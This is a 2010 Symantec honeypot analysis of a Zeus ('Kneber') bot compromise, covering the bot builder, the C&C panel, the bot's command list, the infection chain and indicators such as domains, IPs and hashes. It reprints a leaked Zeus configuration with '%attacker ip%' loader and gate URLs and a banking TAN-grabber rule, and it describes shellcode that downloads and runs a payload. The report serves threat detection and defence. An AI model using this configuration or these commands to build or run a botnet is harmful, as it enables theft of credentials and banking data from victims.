DeepSight™ Threat Management System

HoneyNet Analysis

Zeus Bot Honeypot Compromise

Version 1: February 24, 2010, 23:00 GMT

Analyst: Anthony Roe

Executive summary Associated vulnerabilities

Microsoft Active Template Library
On January 23, 2010, a DeepSight Honeypot was compromised Header Data Remote Code Execution
by Zeus Bot. This bot has received a lot of media hype lately Vulnerability
under the alias “Kneber”.
Associated Bugtraq ID
The purpose of this analysis is to describe this Zeus compromise 35558
so that customers can recognize this malware in the wild.
Compromised application
Microsoft Video ActiveX Control
Action items
The DeepSight Threat Analysis Team recommends the following Compromised platform
action items: Windows XP SP2

HoneyPot ID
 Ensure that antivirus software is current to detect this
377850
threat.
 Ensure that installed software is fully patched to avoid
compromise.

HoneyNet Analysis — February 24, 2010 — Copyright © 2010 Symantec Page 1

Technical description
Zeus bot overview
Zeus bot (also named “Kneber” in some news reports) consists of a bot binary, a builder application, a
configuration file, and a web-based control panel. The builder application is used to build an obfuscated
configuration file and a custom bot for the attacker. Once the configuration file is built, it is uploaded
onto a webserver. Once the bot is installed, it connects to this webserver so the attacker can remotely
control the bot using a web-based control panel.

There are many versions of Zeus. The bot has modules that influence browser processes to steal
browsing information such as authentication credentials. At the time of writing, we are aware of modules
that support Internet Explorer, Mozilla Firefox, and Opera browsers. We will likely see other modules to
support different browsers as Zeus is actively maintained. When an attacker wishes to start a new botnet,
they will either purchase the latest version of Zeus from the malware authors or will download one of the
many leaked versions of the bot for free.

Packers are often used by attackers that use Zeus to modify the bot binary and prevent this common bot
from being detected by antivirus software. Since the Zeus bot doesn’t have any methods of propagation,
distribution of the bot is left up to the attacker creating the bot network. This is why the campaigns that
are used to install this bot vary wildly on a botnet-to-botnet basis. Many methods can be used to deliver
the bot to the victim; the following are the most common that are seen in the wild:

 Email spam campaigns to lure victims to a malicious site containing exploits or a message crafted
to convince the victim to install the bot from an email attachment.
 Malicious sites that couple drive-by exploit kits and social engineering to install the bot on a
victim’s computer when the victim visits the site.
 Pay-per-install services where the attacker pays a third party to install the malware onto a
victim’s computer.

The client-side exploit kits that are commonly seen with a Zeus bot attack are not a part of the Zeus bot
builder. These kits are bought and sold separately; the attacker configures them to install the copy of
Zeus bot that the attacker has built for the current botnet campaign. The attacker configures the exploit
kit so that the Zeus bot is installed when a victim is successfully compromised by the drive-by exploit kit.
This is typically a trivial operation where the attacker simply specifies a URL that stores the attacker’s
copy of Zeus bot. The versatility of Zeus coupled with an exploit kit is likely one of the reasons why
reporters often get confused by this malware and describe it as new.

We will not cover exploit kits in this analysis, but some of the common kits that are popular are Unique,
Phoenix, YES, Eleonore, Liberty, and a relative newcomer called Fragus, which is currently being sold for
$800 dollars. (See Figure 1 for a screenshot of the configuration panel for Fragus.) These exploit kits are
hosted on a webserver. When the victim visits this webserver, their system may be compromised if they
are vulnerable to one of the vulnerabilities that the exploit kit targets.

HoneyNet Analysis — February 24, 2010 — Copyright © 2010 Symantec Page 2

 Figure 1. Fragus exploit pack configuration console.

Building Zeus
The process to build a custom Zeus bot for the attacker’s botnet is very easy. The process is driven by a
GUI application (Figure 2) and a configuration file. The attacker selects a configuration file using the
Browse… button in the builder section of the GUI.

Figure 2. GUI application used to build a Zeus bot.

HoneyNet Analysis — February 24, 2010 — Copyright © 2010 Symantec Page 3

 The following configuration file is an example file taken from a leaked Zeus bot. The configuration file
consists of several sections, but the first sections to be customized are the url_config and
url_compip values in the StaticConfig section and the url_loader and url_server values in
the DynamicConfig section. These values will point to a server that the attacker controls. This is why
Zeus bot command-and-control (C&C) servers change often and differ from botnet to botnet.

;Build time: 09:48:52 16.01.2010 GMT

;Version: 1.2.7.19

entry "StaticConfig"
;botnet "btn4"
timer_config 60 1
timer_logs 1 1
timer_stats 20 1
url_config "%attacker ip%/cfg.bin"
url_compip "%attacker ip%/ip.php" 4096
encryption_key "123123"
;blacklist_languages 1049
end

entry "DynamicConfig"
url_loader "%attacker ip%/botname.exe"
url_server "%attacker ip%/gate.php"
file_webinjects "webinjects.txt"
entry "AdvancedConfigs"
;"/cfg1.bin"
end
entry "WebFilters"
"!*.microsoft.com/*"
"@*/login.osmp.ru/*"
end
entry "WebDataFilters"
;"http://mail.rambler.ru/*" "passw;login"
end
entry "WebFakes"
;"http://www.google.com" "http://www.yahoo.com" "GP" "" ""
end
entry "TANGrabber"
"https://banking.*.de/cgi/ueberweisung.cgi/*" "S3R1C6G" "*&tid=*"
end
entry "DnsMap"
;127.0.0.1 microsoft.com
end
end

Figure 3. Zeus bot configuration file example.

The encryption_key is used to obfuscate data sent to and from the C&C web application. Some of the
other sections are also updated to add websites and fields that the attacker wishes to monitor and steal
information from. Finally, the DnsMap section is used to resolve a domain name to an attacker-specified
address. Once the attacker has finished editing the configuration file, they then build the bot using the
GUI’s Build Config and Build Loader buttons. The customized Zeus bot is now ready to be deployed.
At this point, the attacker will likely pack the file to make sure that it is not detected by current antivirus
signatures.

Building the Zeus bot control panel

The Zeus bot control panel is the PHP web application that is used as the C&C for a Zeus botnet. The
attacker simply configures an SQL database and then runs an install PHP script on the webserver to
install the control panel application. The attacker then uploads the .bin and .exe files that were

HoneyNet Analysis — February 24, 2010 — Copyright © 2010 Symantec Page 4

 configured during the Zeus bot build process to the webserver that is hosting the Zeus bot control panel.
The attacker can then access the cp.php script to view the Zeus bot control interface (shown in Figure
4).

Figure 4. Zeus bot web control panel.

When the attacker installs the bot on a victim’s computer, the bot will be displayed in this control panel
(see Figure 5 below). The web GUI allows the attacker to easily monitor this bot, to profile the
compromised system, and to send commands for the bot to obey.

Figure 3. Zeus bot web control panel with one bot connected.

Using the control panel, the attacker can run the commands listed in Table 1. Note that the functionality
of the bot varies from version to version. These commands are supported by Zeus bot version 1.2.7.19.

HoneyNet Analysis — February 24, 2010 — Copyright © 2010 Symantec Page 5

 Zbot Version 1.2.7.19 Commands
Command Function
reboot Reboot computer.
kos Kill Operating System.
shutdown Shut down Computer.
bc_add [service][ip][port] Add connect back for [service] using a server with
the [ip] and [port].
bc_del [service][ip][port] Remove specified connect back.
block_url [url] Block access to specified URL.
unblock_url [url] Unblock access to specified URL.
block_fake [url] The bot can inject fake content into the browser
for websites. This command blocks the injection of
this fake content for the specified URL.
unblock_fake [url] This command re-enables the injection of fake
content for a specified URL.
rexec [url] [args] Download and execute a file from specified URL.
The attacker can specify arguments that will be
passed to the executed file if they wish.
rexeci [url] [args] Download and execute a file from specified URL
using an interactive user. The attacker can specify
arguments that will be passed to the executed file
if they wish.
rexec [file] [args] Execute a local file. The attacker can specify
arguments that will be passed to the executed file
if they wish.
lexeci [file] [args] Execute a local file using an interactive user. The
attacker can specify arguments that will be passed
to the executed file if they wish.
addsf [file mask] Add a file mask to affect the results of local file
searches.
delsf [file mask] Remove a file mask to affect the results of local file
searches.
getfile [path] Upload a specified file from the victim’s computer
to the C&C server.
getcerts Upload certificates from all stores to the C&C
server.
resetgrab Upload the contents of the browser-protected
storage to the C&C server.
upcfg [url] Update the bot’s configuration file with the
configuration information at the specified URL.
rename_bot [name] Rename the bot.
getmff Upload Macromedia Flash files to the C&C server.
delmff Remove Macromedia Flash files from the
computer.
sethomepage [url] Set the browser homepage to the specified URL.
Table 1. List of bot capabilities.

HoneyNet Analysis — February 24, 2010 — Copyright © 2010 Symantec Page 6

Honeypot compromise
Our honeypot crawled to the URL hxxp://cronnerberg[.]com/new/load.php?i=4, which
resolves to the IP 92.60.176.38. This resulted in an obfuscated JavaScript getting served to the
browser on the Honeypot (Internet Explorer 6).

Figure 4. Decoded shellcode.

When the JavaScript was decoded, we found that it contained exploits for the following vulnerabilities:

 AOL Radio AmpX ActiveX Control 'ConvertFile()' Buffer Overflow Vulnerability (BID: 35028)
 Microsoft Active Template Library Header Data Remote Code Execution Vulnerability (BID:
35558) [DirectShow ActiveX Control vector]
 Microsoft Internet Explorer ADODB.Stream Object File Installation Weakness (BID: 10514)
 Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download Vulnerability (BID:
30114)
 Adobe Reader 'util.printf()' JavaScript Function Stack Buffer Overflow Vulnerability (BID: 30035)
 Adobe Acrobat and Reader Collab 'getIcon()' JavaScript Method Remote Code Execution
Vulnerability (BID: 34169)
 Adobe Reader and Acrobat (CVE-2009-2994) U3D 'CLODMeshDeclaration' Buffer Overflow
Vulnerability (BID: 36689)
 Adobe Acrobat and Reader Multiple Arbitrary Code Execution and Security Vulnerabilities (BID:
27641/CVE-2007-5659)

The exploit pack also included exploits for a Java as well as an Adobe Flash vulnerability. Unfortunately,
we didn’t have enough data captured to be able to identify the exact vulnerabilities that were being
exploited by each of these additional exploits. It’s difficult to identify the exploit kit that was used in the
compromise of this honeypot, but based on the exploits that are included and the script format, we
suspect that it’s either the Eleonore or Phoenix exploit pack, but this is unconfirmed and is merely
conjecture.

When the Microsoft Active Template Library Header Data Remote Code Execution Vulnerability (BID
35558) was exploited on our honeypot, the shellcode that runs will find the path to the local temporary
files directory using GetTempPathA().

The shellcode then loads the urlmon.dll library and gets the address of URLDownload() from this
library using the GetProcAddress() function. Next, the shellcode attempts to download an executable
from hxxp://cronnerberg.com/new/load.php?i=10 to %TempPath%\pdfupd.exe. Once the

HoneyNet Analysis — February 24, 2010 — Copyright © 2010 Symantec Page 7

 file is downloaded, it is executed using WinExec(). The shellcode also tries to download a second file,
but the URL is corrupt so the second file download fails.

The downloaded pdfupd.exe executable makes a request to atx777.homeip.net (95.169.186.103)

for the pvt777/gtx9.php?id=1d972b84 script.

The webserver responds to this request with a list of URLS that are delimited by a semicolon character:
hxxp://atx777.homeip.net/ldx.exe;hxxp://atx777.homeip.net/severa/veton.exe;hx
xp://atx777homeip.net/tbot.exe;

Figure 5. Network activity generated by the compromise.

The pdfupd.exe executable will download each of these executables and then install them on the
compromised system. The file ldx.exe is the Zeus bot binary in this compromise; we can see the
request for the bot configuration conflake9.bin in Figure 5.

In addition to installing Zeus bot in this compromise, this attacker also installed Waledac. This malware is
known to have a pay-per-install program that miscreants can use to monetize their activity. Since Zeus
bot is designed to collect credentials from web-browsing activity and since Waledac was also dropped
onto this system, this may mean that this attacker had financial motivations.

Because Zeus bot is freely available, easy to use and configure, and contains powerful capabilities,
attackers commonly use it. Attack scenarios will differ on a case-by-case basis, depending on the
motivations and skill of the attacker building the bot network. The Zeus bot is most often employed in
attacks that have financial motivations.

The best defense against Zeus bot is network- and host-based IPS/IDS, current antivirus software, and
keeping network systems up to date with current patches for software vulnerabilities. The malware that
was installed during this attack against our Honeypot is detected by Symantec AntiVirus as Trojan
Horse.

Attack data
Filenames
Filename: pdfupd.exe
SHA1: 7f7403f2c476a2b8aaa09c224dba6f2de2aab269

Filename: ldx.exe

HoneyNet Analysis — February 24, 2010 — Copyright © 2010 Symantec Page 8

 SHA1: 5b0de33f02bf946de8a7b20b0b69e655315fb17d

Filename: tbot.exe
SHA1: 1d4d3f3cd3642f102c7f16609e02462fc63fc5d8

Filename: veton.exe
SHA1: b06e994355bda719bd98552933c3b3e2d371bfce

Text description of damages

The system is backdoored by this attack, allowing the remote attacker to perform any action that they
wish, including installing additional malware. Ideally, a system that is found to be running a remote
backdoor should have the operating system reinstalled.

System behavior
Outbound HTTP activity from the affected system.

IP addresses
The following domain names and IPs were involved in this attack:
 cronnerberg.com (92.60.176.38)
 atx777.homeip.net (95.169.186.103
 lake777.homeip.net (95.169.186.103)

Port numbers involved

TCP port 80

Change log
Version 1: February 24, 2010, 23:00 GMT
Initial HoneyNet Analysis released.

HoneyNet Analysis — February 24, 2010 — Copyright © 2010 Symantec Page 9

Glossary
If you are unfamiliar with any term this report uses, please visit the SecurityFocus glossary at
http://www.securityfocus.com/glossary for more details on information security terminology.

Contact information
World Headquarters
Symantec Corporation
20300 Stevens Creek Blvd.
Cupertino, CA 95014
U.S.A.
+1 408 517 8000
www.symantec.com

About Symantec
Symantec, the world leader in Internet security technology, provides a broad range of content and
network security software and appliance solutions to enterprises, individuals, and service providers. The
company is a leading provider of client, gateway, and server security solutions for virus protection,
firewall and virtual private network, vulnerability management, intrusion detection, Internet content and
e-mail filtering and remote management technologies, as well as security services to enterprises and
service providers around the world. Symantec's Norton brand of consumer security products is a leader in
worldwide retail sales and industry awards. Headquartered in Cupertino, Calif., Symantec has worldwide
operations in 38 countries. For more information, please visit www.symantec.com.

DeepSight Conditions: NO WARRANTIES, EXPRESSED OR IMPLIED, INCLUDING, WITHOUT LIMITATION, THE IMPLIED
WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT, SHALL APPLY TO THE
DEEPSIGHT SERVICES OR THE MATERIALS PROVIDED BY SYMANTEC TO USERS OF THE DEEPSIGHT SERVICES. SYMANTEC
PROVIDES THE SERVICE(S) AND MATERIALS “AS IS” AND “AS AVAILABLE.” IN NO EVENT WILL SYMANTEC BE LIABLE FOR THE
TRUTH, ACCURACY, RELIABILITY OR COMPLETENESS OF THE SERVICE(S) OR MATERIALS. SYMANTEC MAKES NO WARRANTY
THAT THE SERVICE(S) OR MATERIALS WILL BE UNINTERRUPTED OR TIMELY, OR THAT THEY WILL PROTECT AGAINST
COMPUTER VULNERABILITIES. Please refer to your services agreement or certificate for further information on conditions of use for
the Services and materials.
Trademarks: Symantec, the Symantec logo, and DeepSight are US registered trademarks of Symantec Corporation or its
subsidiaries. DeepSight Analyzer, DeepSight Extractor, and Bugtraq are trademarks of Symantec Corporation or its subsidiaries.
Other brands and products are trademarks of their respective holders.
Quoting Symantec Information and Data: Authorized Users of Symantec's Deep Sight Services may use or quote individual
sentences and paragraphs from the materials provided as part of the Services, but not large portions or the majority of such
materials, solely for purposes of internal communications. Unless otherwise specifically agreed in writing by Symantec, no external
publication of all or any portion of any materials provided by Symantec is permitted.
Copyright © 2010 Symantec Corporation. All rights reserved. Reproduction is forbidden unless authorized.

HoneyNet Analysis — February 24, 2010 — Copyright © 2010 Symantec Page 10